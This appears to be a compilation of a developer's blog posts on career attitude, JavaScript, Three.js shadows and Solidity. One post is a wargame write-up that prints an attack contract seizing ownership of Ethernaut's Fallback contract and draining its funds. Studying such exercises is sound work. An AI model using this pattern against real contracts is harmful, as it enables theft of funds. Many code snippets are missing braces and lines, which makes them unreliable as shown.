The client eventually asked me to be a superhero!


It was a Friday when I was working for a software agency a few years ago. After work that day, I was planning a weekend vacation with my family. But in the middle of the night, I got a call from the manager. He said that there was a risk that the product could not be delivered on the date promised with the customer due to an issue that occurred in the QA stage. Then he asked me to become a superhero and help the client, then save the world.


I said, "Of course". I could have turned down his request. Not only additional work was not in the contract, but also both my personal life and time with my family were precious. But if I had turned down his request because of spending time with my family, he would probably not be able to keep his promises to customers and lose his credibility.

The problem doesn't end there. If the company I belong to loses credibility among customers, the company no longer has any value as an agency. Therefore, I myself will become a useless person, which indirectly affects my personal life. So I decided to cancel the weekend break and immediately started work to resolve the issue raised.

The idea of ​​only maintaining trust with the customer and satisfying the customer allowed me to concentrate more on the work, and as a result, I have solved the problem and delivered the final product much sooner than the promised time.

A few days later, after talking to the customer, the manager said that "both we and client appreciate for your hard work". Of course, there was an off-contract bonus.


Through this work, I was convinced of two lessons.

First, as a member of an organization, your goal is not to earn hourly money or salary, but to set the organization's purpose as my your and to share ideas for success.

Second, it is necessary to constantly try to ensure the quality of the features that you always make. At that time, there were other developers on the team besides me. But it was necessary to think about why the manager asked me first. I always write bug-free, optimized code and care about how my work works in the final product delivered to the customer. I always evaluate software products from the customer's point of view, and believe in my responsibility to improve and maintain the user experience. This mindset made the manager believe that there is always someone out there who can solve the problems raised, and I think that's the reason why he asked me first.

The point is to become a necessity - to be somebody, not just anybody.

This is why I always say that developers are also responsible for the success of the company.

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Gas Adjustment – One of the differences between `call` vs `transfer`/`send` in Solidity

A few days ago, I inspired by the Solidity wargame - Ethernaut designed by OpenZeppelin, and decided to make a hacker contract to attack Fallback contract automatically.

Fallback is one of the levels designed in Ethernaut.

I thought that it would be very easy before I started, but when I tested the completed hacker contract, I couldn't even imagine that I would spend a whole day to finish because of one of the important knowledge that was related to gas.

Here is the completed source code of Hacker contract.

// SPDX-License-Identifier: MIT
pragma solidity >=0.8.5 <0.9.0;

interface FallbackInterface {
  function contribute() external payable;
  function withdraw() external;

contract Hacker {

  address payable public hacker;

  constructor() {
    hacker = payable(msg.sender);

  modifier onlyHacker {
      msg.sender == hacker,
      "caller is not the hacker"

  function attack(address _target) external payable onlyHacker {
      msg.value > (0.001 ether), 
      "Not enough ether to attack."

    uint contributionFee = 0.0005 ether;

    // 0. Get the target contract.
    FallbackInterface fallbackInstance = FallbackInterface(_target);

    // 1. Contribute with ether less than 0.001.
    fallbackInstance.contribute{value: contributionFee}();

    // 2. Send Transaction to claim owner, should set the gas as enough as the target contract is able to modify owner.
    (bool result,) = payable(_target).call{gas: 100000, value: address(this).balance}("");
    if (result) {

    // 3. Withdraw all ether

    // 4. Put back into my pocket.

  // With it, it can receive ether from the target contract.
  receive() external payable {}


Please walk though my github repository to see the source code that helps you understand things.

You could find the code line that uses call function instead of transfer or send in order to send ether to the target contract in Hacker.sol. In many documents, call is dangerous, and needs care about using it. And I do recommend not to use it for your real smart contract. ?

One of the important differences between call and transfer or send, is that when using call, you can set the amount of gas that will be available in the transaction generated by call call.

The call in Hacker contract will call fallback function in Fallback contract.

Look at that fallback function, and try to predict how many gas it would need? Here are some Ethereum specifications that help you to calculate it.

To occupy a 256 Bit slot of Storage costs 20,000 gas. Changing a value of an already occupied slot costs 5,000 gas.

In the fallback function, it replaces the owner with the new one, and the owner is a state variable that stores on Storage. Then you can easily get the amount of gas required for the fallback function as roughly more than 25,000 gas.

But trasfer and send functions are limited with 2300 gas stipend and not adjustable. ? So, if you attack with transfer or send, you will get "Out of Gas" exception, and in many cases, Remix, truffle and etc, they don't give the exact error description. (It's secret that I spent a whole day to find the reason for the exception.)

With call you can adjust the amount gas used in the called contract, and the sufficient amount of gas will allow the target contract to replace the owner, ultimately you will get success on the attack.

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JavaScript – diff between for…in vs for…of

  • for in: loops over enumerable property names of an object.
  • for of: (new in ES6) does use an object-specific iterator and loops over the values generated by that.

Both for..of and statements iterate over lists; the values iterated on are different though, returns a list of keys on the object being iterated, whereas for..of returns a list of values of the numeric properties of the object being iterated.

let list = [4, 5, 6];

for (let i in list) {
   console.log(i); // "0", "1", "2",

for (let i of list) {
   console.log(i); // "4", "5", "6"
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Three.js Texture Shadow


Shadows on computers can be a complicated topic. There are various solutions and all of them have tradeoffs including the solutions available in three.js.

Three.js by default uses shadow maps. The way a shadow map works is, for every light that casts shadows all objects marked to cast shadows are rendered from the point of view of the light. READ THAT AGAIN! and let it sink in.

In other words, if you have 20 objects, and 5 lights, and all 20 objects are casting shadows and all 5 lights are casting shadows then your entire scene will be drawn 6 times. All 20 objects will be drawn for light #1, then all 20 objects will be drawn for light #2, then #3, etc and finally the actual scene will be drawn using data from the first 5 renders.

It gets worse, if you have a point light casting shadows the scene has to be drawn 6 times just for that light!

For these reasons it's common to find other solutions than to have a bunch of lights all generating shadows. One common solution is to have multiple lights but only one directional light generating shadows.

Yet another solution is to use lightmaps and or ambient occlusion maps to pre-compute the effects of lighting offline. This results in static lighting or static lighting hints but at least it's fast.

Another solution is to use fake shadows. Make a plane, put a grayscale texture in the plane that approximates a shadow, draw it above the ground below your object.

Here is an example using fake shadow. It renders 15 spheres, but it's really fast with less resources used.


You can play with it in codesandbox -

In some apps it's common to use a round or oval shadow for everything but of course you could also use different shaped shadow textures. You might also give the shadow a harder edge. A good example of using this type of shadow is Animal Crossing Pocket Camp where you can see each character has a simple round shadow. It's effective and cheap. Monument Valley appears to also use this kind of shadow for the main character.

Tony -

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When Frozen is connected to a Developer

Everyone has their favorite movies and their favorite characters. My favorite characters are Elsa and Anna from Frozen. Elsa and Anna are like two sides of a coin, both strong, albeit one through power and confidence and the other through clumsy sticktuitiveness and love. But sometimes I find their different personalities in the two programming languages that are popular among developers. You would have almost guessed it. Yes, TypeScript and JavaScript. Elsa is powerful, beautiful, elegant, magical, and charismatic. If you offend her, you can become a piece of ice that is a compile error. So I compare Elsa to TypeScript, because it illustrates the maturing of her powers. Anna is more daring than graceful and, at times, can act before she thinks – compile. She doesn’t have good postures, she’s not very elegant, but she’s a good person and she’s utterly determined. Anna is flexible, smart, lovable, and optimistic. Just like JavaScript. Which of those two do you think I like more? Well, both of them are essential to making my life easier in a way of entertaining as well as programming. Do you guys agree too? What is your favorite programming language? How about looking for a character […]
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A React.js Developer’s responsibility

Hi, my name is Tony. I graduated from Dalian University with a degree in software engineering and I worked on several projects in the software industry.I have been a React developer for the past 2 years.Having worked with many global companies and teams over the years, I have found that they are not looking for just skilled, professional, and senior developers. A person who is passionate about adding value to brands and products of the companies and teams. A person with a philosophy that connects his life to the success of organizations and companies. Perhaps that kind of person is the one that most companies want.It is because the developer is also responsible for the success of the company.His responsibility is writing codes not only just running, but also considered user experience, performance, and compatibility, even though it’s a line. I am aiming to provide high-quality codes that assist the teams in achieving their ultimate goals.I write bug-free and optimized code and care about how my code works in the final product delivered to the customer.I always evaluate software products from the customer’s point of view, and I believe that my responsibility is maintaining and improving the user experience. Are […]
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What are the differences between variables created using `let`, `var` or `const`?

What are the differences between variables created using let, var or const?

Variables declared using the var keyword are scoped to the function in which they are created, or if created outside of any function, to the global object. let and const are block scoped, meaning they are only accessible within the nearest set of curly braces (function, if-else block, or for-loop).

function foo() {
  // All variables are accessible within functions.
  var bar = 'bar';
  let baz = 'baz';
  const qux = 'qux';

  console.log(bar); // bar
  console.log(baz); // baz
  console.log(qux); // qux

console.log(bar); // ReferenceError: bar is not defined
console.log(baz); // ReferenceError: baz is not defined
console.log(qux); // ReferenceError: qux is not defined
if (true) {
  var bar = 'bar';
  let baz = 'baz';
  const qux = 'qux';

// var declared variables are accessible anywhere in the function scope.
console.log(bar); // bar
// let and const defined variables are not accessible outside of the block they were defined in.
console.log(baz); // ReferenceError: baz is not defined
console.log(qux); // ReferenceError: qux is not defined

var allows variables to be hoisted, meaning they can be referenced in code before they are declared. let and const will not allow this, instead throwing an error.

console.log(foo); // undefined

var foo = 'foo';
console.log(baz); // ReferenceError: can't access lexical declaration 'baz' before initialization

let baz = 'baz';
console.log(bar); // ReferenceError: can't access lexical declaration 'bar' before initialization

const bar = 'bar';

Redeclaring a variable with var will not throw an error, but 'let' and 'const' will.

var foo = 'foo';
var foo = 'bar';
console.log(foo); // "bar"

let baz = 'baz';
let baz = 'qux'; // Uncaught SyntaxError: Identifier 'baz' has already been declared

let and const differ in that let allows reassigning the variable's value while const does not.

// This is fine.
let foo = 'foo';
foo = 'bar';

// This causes an exception.
const baz = 'baz';
baz = 'qux';
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Cryptozombies Ethereum Oracle Course

Through the weekend, I completed Cryptozombies Oracle lessons.In the lessons, you can learn about building smart contracts and building decentralized Oracle.
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Render Shadertoy in Three.js – Mushroom

Today I imported a shader created by "iq" from shadertoy, and rendered it into a beautiful mushroom ever in Three.js. The shocking thing is that it made with only programming codes. You can look through the source code here - Here is my

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Deep diving into JavaScript array – evolution & performance

Inspired from Paul Shan

Before starting the article I would like to state that this is not about the basic of JavaScript array. Neither about teaching syntaxes or showing usage examples. The article is more about memory representation, optimization, behavior differences over syntaxes, performance and the recent evolution.

When I started using JavaScript for the first time; I was already familiar with C, C++, C# etc. And trust me like many other C/C++ people, I also didn’t have a good first date with JavaScript.

One of the major reasons why I didn’t like JavaScript was, its Array. As JavaScript arrays are implemented as hash-maps or dictionaries and not contiguous, I was feeling like this is a B grade language; can’t even implement an array properly. But since then both JavaScript and my understanding with JavaScript has changed… a lot.

Why JavaScript arrays are not actual arrays

Before stating something about JavaScript, let me tell you what is an Array. So, arrays are a bunch of continuous memory location, used to hold some values. Here the emphasis is on the word continuous or contiguous; because this has a significant effect.

An memory representation of an array has been provided in the picture above. So it is made to hold 4 elements of 4 bits each. Thus it is taking 16 bits memory blocks, all in the same order.

Suppose, I’ve declared tinyInt arr[4]; and it has captured a series of memory blocks, starting from address 1201. Now at some point if I try to read a[2], what it will do is a simple mathematical calculation to find out the address of a[2]. Something like 1201 + (2 X 4) and will directly read from address 1209.

In JavaScript, an array is a hash-map. It can be implemented using various data structures, one of them is linked-list. So in JavaScript if you declare an array var arr = new Array(4); it will make a structure like the picture above. Thus, if you want to read from a[2] any any point in your program; it has to traverse starting from 1201 to find the address of a[2].

So this is how JavaScript arrays are different from actual arrays. Obviously a mathematical calculation will take way lesser time than an linked-list traversal. For long arrays, life will be more tough.

Evolution of JavaScript arrays

Remember the days when we used to feel jealous if a friend gets 256MB RAM in his computer? But today, 8GB RAM is a common thing.

Just like this, JavaScript has a language also have evolved a lot. With the immense effort from V8, SpiderMonkey, TC39 and the growing number of web users, JavaScript has become a necessity for the world. And performance improvement is an obvious need if you have a huge user base.

JavaScript engines these days actually allocate contiguous memory for its arrays; if the array if homogeneous (all elements of same type). Good programmers always keep their array homogeneous and JIT (just in time compiler) taking the advantage of that does all its array reading calculation just like the way C compiler does. But, the moment you want to insert an element of different type on that homogeneous array, JIT de-structure the entire array and recreate with the old-days style. So, if you are not writing bad codes, JavaScript Array objects maintains an actual array behind the scene, which is really great for the modern JS developers.

Not only that, the arrays have evolved even more with ES2015 or ES6. TC39 decided to include typed array in JavaScript and thus; we have ArrayBuffer with us today. ArrayBuffer gives you a chunk of contiguous memory chunk and let you do whatever you want with it. However, dealing directly with memory is very low level and more complicated. So we have Views to deal with ArrayBuffer. There are already some views available and more can be added in future.

var buffer = new ArrayBuffer(8);
var view   = new Int32Array(buffer);
view[0] = 100;

If you want to know more about the usage of Typed Arrays in JavaScript, you can go through the MDN Documentation.

Typed arrays are performant and efficient. It was introduced after the request from WebGL people, as they were facing immense performance issues without a way to handle binary data efficiently. You can also share the memory using SharedArrayBuffer across multiple web-workers to get a performance boost. Amazing right? It started from simple hash-maps and now we are dealing with SharedArrayBuffer.

Old Array vs Typed Array - performance

We’ve talked a lot on array evolution in JavaScript. Now let’s check how beneficial are the modern arrays. I have done some small tests here and all are done with Node.js 8.4.0 on Mac.

Old Array - insertion

var LIMIT = 10000000;
var arr = new Array(LIMIT);
console.time("Array insertion time");
for (var i = 0; i < LIMIT; i++) {
    arr[i] = i;
console.timeEnd("Array insertion time");

Time taken: 55ms

Typed Array - insertion

var LIMIT = 10000000;
var buffer = new ArrayBuffer(LIMIT * 4);
var arr = new Int32Array(buffer);
console.time("ArrayBuffer insertion time");
for (var i = 0; i < LIMIT; i++) {
    arr[i] = i;
console.timeEnd("ArrayBuffer insertion time");

Time taken: 52ms

Damn, what am I seeing? The performance of old traditional array and ArrayBuffer are same? Nope. Remember, I told before that the compilers these days are smart and converts the traditional array to an actual contiguous memory array internally, if it’s homogeneous. That’s exactly what happened here in the first example. Though I used new Array(LIMIT), then also it was maintaining a modern array in it.

Now let’s modify the first example and make it a heterogeneous array and let’s see if there’s any performance difference.

Old Array - insertion (heterogeneous)

var LIMIT = 10000000;
var arr = new Array(LIMIT);
arr.push({a: 22});
console.time("Array insertion time");
for (var i = 0; i < LIMIT; i++) {
    arr[i] = i;
console.timeEnd("Array insertion time");

Time taken: 1207ms

All I have done here is, added a new expression in line no. 3 to make the array heterogeneous. Everything else is exactly same as before. But see the performance difference. It’s 22 times slower.

Old Array - read

var LIMIT = 10000000;
var arr = new Array(LIMIT);
arr.push({a: 22});
for (var i = 0; i < LIMIT; i++) {
    arr[i] = i;
var p;
console.time("Array read time");
for (var i = 0; i < LIMIT; i++) {
    //arr[i] = i;
    p = arr[i];
console.timeEnd("Array read time");

Time taken: 196ms

Typed Array - read

var LIMIT = 10000000;
var buffer = new ArrayBuffer(LIMIT * 4);
var arr = new Int32Array(buffer);
console.time("ArrayBuffer insertion time");
for (var i = 0; i < LIMIT; i++) {
    arr[i] = i;
console.time("ArrayBuffer read time");
for (var i = 0; i < LIMIT; i++) {
    var p = arr[i];
console.timeEnd("ArrayBuffer read time");

Time taken: 27ms


Introduction of typed array in JavaScript is a great step. Int8Array, Uint8Array, Uint8ClampedArray, Int16Array, Uint16Array, Int32Array, Uint32Array, Float32Array, Float64Array etc are typed array views, who are in native byte order. However, you can also check DataView to create your custom view window. Hope in future we will find more DataView libraries to use ArrayBuffer with ease.

It’s nice to see arrays have been improved in JavaScript. Now they are fast, efficient, robust, and smart enough while allocating memory.

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